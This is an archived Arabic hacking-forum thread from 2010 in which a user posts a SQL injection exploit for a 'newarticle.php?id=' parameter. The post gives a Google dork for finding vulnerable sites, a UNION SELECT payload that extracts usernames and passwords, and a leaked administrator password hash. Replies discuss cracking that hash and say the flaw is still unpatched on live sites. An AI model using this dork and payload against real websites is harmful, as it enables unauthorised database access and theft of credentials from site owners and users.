:: vBspiders Professional Network ::

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   SQL قواعد البيانات (http://www.vbspiders.com/vb/forumdisplay.php?f=133)
-   -   ثغرة أعلن عنها لأول مرة هنا في منتدى vbspiders (http://www.vbspiders.com/vb/showthread.php?t=35103)

soufhak 08-19-2010 10:24 AM

ثغرة أعلن عنها لأول مرة هنا في منتدى vbspiders
 
بسم الله الرحمان الرحيم

السلام عليكم و رحمة الله و بركاته و بعد




#
Exploit Title : Sql Injection Vulnerability
# Date : 18-08-2010
# Author : soufhacker
# Version : All Versions

###############################################
Dork google: inurl:newarticle.php?id=
###############################################
Exploit:
http://site.com/path/newarticle.php?id=-805+UNION SELECT 1,concat(username,0x3a,password),3,4,5,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 ,28,29+from+access_all_areas.user--

###############################################
username : Admin
password : $1$V-s+pArA$T9V7JXDNeJ2AqiV9kfgCl/
Done!
#############soufhacker################

عبد الله ر 08-19-2010 11:08 AM

يعطيك العافية على الثغرة
باقي نفك الهاش

soufhak 08-19-2010 12:54 PM

شكرا على مرورك الطيب أخي الكريم أما الهاش فقد فكيتوا لكن ماراح أحطوا إلا بعد ما أرا الجدية من الأعضاء

GuEvArA511 08-19-2010 02:14 PM

[align=center]الهاش وش نوعه ؟؟ اول مره اشوفه

**--**--**--**--**--**--**

السركبت هذا ألي فية 29 موقع مركبة وكلها مررررقعة’ :)
[/align]

soufhak 08-19-2010 07:17 PM

شكرا على المرور لكن الثغرات ماهي مرقعة و جرب الثغرة راح تجدها صالحة بإذن الله أما نوع الهاش فهو MD5


الساعة الآن 03:11 AM


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0